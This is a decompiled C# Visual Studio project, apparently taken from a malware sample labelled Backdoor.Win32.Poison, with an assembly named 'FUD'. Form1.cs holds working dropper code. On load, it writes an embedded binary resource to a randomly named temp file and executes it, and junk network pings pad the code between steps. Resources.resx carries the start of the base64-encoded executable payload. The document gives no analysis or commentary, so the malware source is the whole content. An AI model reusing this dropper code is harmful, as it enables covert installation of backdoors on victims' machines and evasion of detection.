<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.aec-4886f6c9f45d8971ab31a20a21e3b704c1278d1a1eac172c181a0c1f50c44e49.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{7965BD14-FD86-475A-AA6B-3F745DF524C0}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>FUD</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>FUD</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Form1.cs" />
<Compile Include="My\MyApplication.cs" />
<Compile Include="My\MyComputer.cs" />
<Compile Include="My\MyProject.cs" />
<Compile Include="My\MySettings.cs" />
<Compile Include="My\MySettingsProperty.cs" />
<Compile Include="My\Resources\Resources.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Form1.resx" />
<EmbeddedResource Include="Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.aec-4886f6c9f45d8971ab31a20a21e3b704c1278d1a1eac172c181a0c1f50c44e49/Backdoor.Win32.Poison.aec.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "FUD", "Backdoor.Win32.Poison.aec-4886f6c9f45d8971ab31a20a21e3b704c1278d1a1eac172c181a0c1f50c44e49.csproj", "{7965BD14-FD86-475A-AA6B-3F745DF524C0}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{7965BD14-FD86-475A-AA6B-3F745DF524C0}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{7965BD14-FD86-475A-AA6B-3F745DF524C0}.Debug|Any CPU.Build.0 = Debug|Any CPU
{7965BD14-FD86-475A-AA6B-3F745DF524C0}.Release|Any CPU.ActiveCfg = Release|Any CPU
{7965BD14-FD86-475A-AA6B-3F745DF524C0}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.aec-4886f6c9f45d8971ab31a20a21e3b704c1278d1a1eac172c181a0c1f50c44e49/Form1.cs
+105
View File
@@ -0,0 +1,105 @@
// Decompiled with JetBrains decompiler
// Type: FUD.Form1
// Assembly: FUD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B2724D87-94C0-4D6D-A3C1-4EC18A6956AE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.aec-4886f6c9f45d8971ab31a20a21e3b704c1278d1a1eac172c181a0c1f50c44e49.exe
using FUD.My;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Windows.Forms;
namespace FUD
{
[DesignerGenerated]
public class Form1 : Form
{
private IContainer components;
[DebuggerNonUserCode]
public Form1()
{
this.Load += new EventHandler(this.Form1_Load);
this.InitializeComponent();
}
[DebuggerNonUserCode]
protected override void Dispose(bool disposing)
{
try
{
if (!disposing || this.components == null)
return;
this.components.Dispose();
}
finally
{
base.Dispose(disposing);
}
}
[DebuggerStepThrough]
private void InitializeComponent()
{
this.SuspendLayout();
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(292, 266);
this.Name = nameof (Form1);
this.Text = nameof (Form1);
this.ResumeLayout(false);
}
private void Form1_Load(object sender, EventArgs e)
{
try
{
MyProject.Computer.Network.Ping(MyProject.Computer.Name);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
MyProject.Computer.Name.Substring(0, 1);
ProjectData.ClearProjectError();
}
string randomFileName = Path.GetRandomFileName();
try
{
MyProject.Computer.Network.Ping(MyProject.Computer.Name);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
MyProject.Computer.Name.Substring(0, 1);
ProjectData.ClearProjectError();
}
File.WriteAllBytes(Path.GetTempPath() + "\\" + randomFileName, FUD.My.Resources.Resources.nevv);
try
{
MyProject.Computer.Network.Ping(MyProject.Computer.Name);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
MyProject.Computer.Name.Substring(0, 1);
ProjectData.ClearProjectError();
}
Interaction.Shell(Path.GetTempPath() + "\\" + randomFileName);
try
{
MyProject.Computer.Network.Ping(MyProject.Computer.Name);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
MyProject.Computer.Name.Substring(0, 1);
ProjectData.ClearProjectError();
}
}
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.aec-4886f6c9f45d8971ab31a20a21e3b704c1278d1a1eac172c181a0c1f50c44e49/Form1.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.aec-4886f6c9f45d8971ab31a20a21e3b704c1278d1a1eac172c181a0c1f50c44e49/My/MyApplication.cs
+48
View File
@@ -0,0 +1,48 @@
// Decompiled with JetBrains decompiler
// Type: FUD.My.MyApplication
// Assembly: FUD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B2724D87-94C0-4D6D-A3C1-4EC18A6956AE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.aec-4886f6c9f45d8971ab31a20a21e3b704c1278d1a1eac172c181a0c1f50c44e49.exe
using Microsoft.VisualBasic.ApplicationServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Windows.Forms;
namespace FUD.My
{
[GeneratedCode("MyTemplate", "8.0.0.0")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal class MyApplication : WindowsFormsApplicationBase
{
[STAThread]
[EditorBrowsable(EditorBrowsableState.Advanced)]
[DebuggerHidden]
internal static void Main(string[] Args)
{
try
{
Application.SetCompatibleTextRenderingDefault(WindowsFormsApplicationBase.UseCompatibleTextRendering);
}
finally
{
}
MyProject.Application.Run(Args);
}
[DebuggerStepThrough]
public MyApplication()
: base(AuthenticationMode.Windows)
{
this.IsSingleInstance = false;
this.EnableVisualStyles = true;
this.SaveMySettingsOnExit = true;
this.ShutdownStyle = ShutdownMode.AfterMainFormCloses;
}
[DebuggerStepThrough]
protected override void OnCreateMainForm() => this.MainForm = (Form) MyProject.Forms.Form1;
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.aec-4886f6c9f45d8971ab31a20a21e3b704c1278d1a1eac172c181a0c1f50c44e49/My/MyComputer.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: FUD.My.MyComputer
// Assembly: FUD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B2724D87-94C0-4D6D-A3C1-4EC18A6956AE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.aec-4886f6c9f45d8971ab31a20a21e3b704c1278d1a1eac172c181a0c1f50c44e49.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace FUD.My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyComputer : Computer
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyComputer()
{
}
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.aec-4886f6c9f45d8971ab31a20a21e3b704c1278d1a1eac172c181a0c1f50c44e49/My/MyProject.cs
+212
View File
@@ -0,0 +1,212 @@
// Decompiled with JetBrains decompiler
// Type: FUD.My.MyProject
// Assembly: FUD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B2724D87-94C0-4D6D-A3C1-4EC18A6956AE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.aec-4886f6c9f45d8971ab31a20a21e3b704c1278d1a1eac172c181a0c1f50c44e49.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.Collections;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace FUD.My
{
[StandardModule]
[GeneratedCode("MyTemplate", "8.0.0.0")]
[HideModuleName]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static MyProject.ThreadSafeObjectProvider<MyProject.MyForms> m_MyFormsObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyForms>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[DebuggerNonUserCode]
static MyProject()
{
}
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.Forms")]
internal static MyProject.MyForms Forms
{
[DebuggerHidden] get => MyProject.m_MyFormsObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[EditorBrowsable(EditorBrowsableState.Never)]
[MyGroupCollection("System.Windows.Forms.Form", "Create__Instance__", "Dispose__Instance__", "My.MyProject.Forms")]
internal sealed class MyForms
{
public Form1 m_Form1;
[ThreadStatic]
private static Hashtable m_FormBeingCreated;
public Form1 Form1
{
[DebuggerNonUserCode] get
{
this.m_Form1 = MyProject.MyForms.Create__Instance__<Form1>(this.m_Form1);
return this.m_Form1;
}
[DebuggerNonUserCode] set
{
if (value == this.m_Form1)
return;
if (value != null)
throw new ArgumentException("Property can only be set to Nothing");
this.Dispose__Instance__<Form1>(ref this.m_Form1);
}
}
[DebuggerHidden]
private static T Create__Instance__<T>(T Instance) where T : Form, new()
{
if ((object) Instance != null && !Instance.IsDisposed)
return Instance;
if (MyProject.MyForms.m_FormBeingCreated != null)
{
if (MyProject.MyForms.m_FormBeingCreated.ContainsKey((object) typeof (T)))
throw new InvalidOperationException(Utils.GetResourceString("WinForms_RecursiveFormCreate"));
}
else
MyProject.MyForms.m_FormBeingCreated = new Hashtable();
MyProject.MyForms.m_FormBeingCreated.Add((object) typeof (T), (object) null);
try
{
return new T();
}
catch (TargetInvocationException ex) when (
{
// ISSUE: unable to correctly present filter
ProjectData.SetProjectError((Exception) ex);
if (ex.InnerException != null)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
throw new InvalidOperationException(Utils.GetResourceString("WinForms_SeeInnerException", ex.InnerException.Message), ex.InnerException);
}
finally
{
MyProject.MyForms.m_FormBeingCreated.Remove((object) typeof (T));
}
}
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) where T : Form
{
instance.Dispose();
instance = default (T);
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyForms()
{
}
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => typeof (MyProject.MyForms);
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
}
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyWebServices
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
internal new System.Type GetType() => typeof (MyProject.MyWebServices);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyWebServices()
{
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[ComVisible(false)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public ThreadSafeObjectProvider()
{
}
}
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.aec-4886f6c9f45d8971ab31a20a21e3b704c1278d1a1eac172c181a0c1f50c44e49/My/MySettings.cs
+73
View File
@@ -0,0 +1,73 @@
// Decompiled with JetBrains decompiler
// Type: FUD.My.MySettings
// Assembly: FUD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B2724D87-94C0-4D6D-A3C1-4EC18A6956AE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.aec-4886f6c9f45d8971ab31a20a21e3b704c1278d1a1eac172c181a0c1f50c44e49.exe
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Configuration;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Threading;
namespace FUD.My
{
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "9.0.0.0")]
[CompilerGenerated]
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal sealed class MySettings : ApplicationSettingsBase
{
private static MySettings defaultInstance = (MySettings) SettingsBase.Synchronized((SettingsBase) new MySettings());
private static bool addedHandler;
private static object addedHandlerLockObject = RuntimeHelpers.GetObjectValue(new object());
[DebuggerNonUserCode]
public MySettings()
{
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
[DebuggerNonUserCode]
private static void AutoSaveSettings(object sender, EventArgs e)
{
if (!MyProject.Application.SaveMySettingsOnExit)
return;
MySettingsProperty.Settings.Save();
}
public static MySettings Default
{
get
{
if (!MySettings.addedHandler)
{
object handlerLockObject = MySettings.addedHandlerLockObject;
ObjectFlowControl.CheckForSyncLockOnValueType(handlerLockObject);
Monitor.Enter(handlerLockObject);
try
{
if (!MySettings.addedHandler)
{
MyProject.Application.Shutdown += (ShutdownEventHandler) ((sender, e) =>
{
if (!MyProject.Application.SaveMySettingsOnExit)
return;
MySettingsProperty.Settings.Save();
});
MySettings.addedHandler = true;
}
}
finally
{
Monitor.Exit(handlerLockObject);
}
}
return MySettings.defaultInstance;
}
}
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.aec-4886f6c9f45d8971ab31a20a21e3b704c1278d1a1eac172c181a0c1f50c44e49/My/MySettingsProperty.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: FUD.My.MySettingsProperty
// Assembly: FUD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B2724D87-94C0-4D6D-A3C1-4EC18A6956AE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.aec-4886f6c9f45d8971ab31a20a21e3b704c1278d1a1eac172c181a0c1f50c44e49.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace FUD.My
{
[StandardModule]
[DebuggerNonUserCode]
[HideModuleName]
[CompilerGenerated]
internal sealed class MySettingsProperty
{
[HelpKeyword("My.Settings")]
internal static MySettings Settings => MySettings.Default;
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.aec-4886f6c9f45d8971ab31a20a21e3b704c1278d1a1eac172c181a0c1f50c44e49/My/Resources/Resources.cs
+48
View File
@@ -0,0 +1,48 @@
// Decompiled with JetBrains decompiler
// Type: FUD.My.Resources.Resources
// Assembly: FUD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B2724D87-94C0-4D6D-A3C1-4EC18A6956AE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.aec-4886f6c9f45d8971ab31a20a21e3b704c1278d1a1eac172c181a0c1f50c44e49.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace FUD.My.Resources
{
[DebuggerNonUserCode]
[StandardModule]
[HideModuleName]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0")]
[CompilerGenerated]
internal sealed class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (object.ReferenceEquals((object) FUD.My.Resources.Resources.resourceMan, (object) null))
FUD.My.Resources.Resources.resourceMan = new ResourceManager("FUD.Resources", typeof (FUD.My.Resources.Resources).Assembly);
return FUD.My.Resources.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => FUD.My.Resources.Resources.resourceCulture;
set => FUD.My.Resources.Resources.resourceCulture = value;
}
internal static byte[] nevv => (byte[]) RuntimeHelpers.GetObjectValue(FUD.My.Resources.Resources.ResourceManager.GetObject(nameof (nevv), FUD.My.Resources.Resources.resourceCulture));
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.aec-4886f6c9f45d8971ab31a20a21e3b704c1278d1a1eac172c181a0c1f50c44e49/Resources.resx
+279
View File
@@ -0,0 +1,279 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<assembly alias="mscorlib" name="mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
<data name="nevv" type="System.Byte[], mscorlib">
<value>
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
sAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0K
JAAAAAAAAAC9D8va+W6liflupYn5bqWJd3G2if1upYkFTreJ+G6liVJpY2j5bqWJAAAAAAAAAABQRQAA
TAECAPPqgEcAAAAAAAAAAOAADwELAQUMAAIAAAAgAAAAAAAACAIAAAACAAAABAAAAABAAAACAAAAAgAA
BAAAAAQAAAAEAAAAAAAAAAAkAAAAAgAAUEoAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAA
AAAAABwCAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
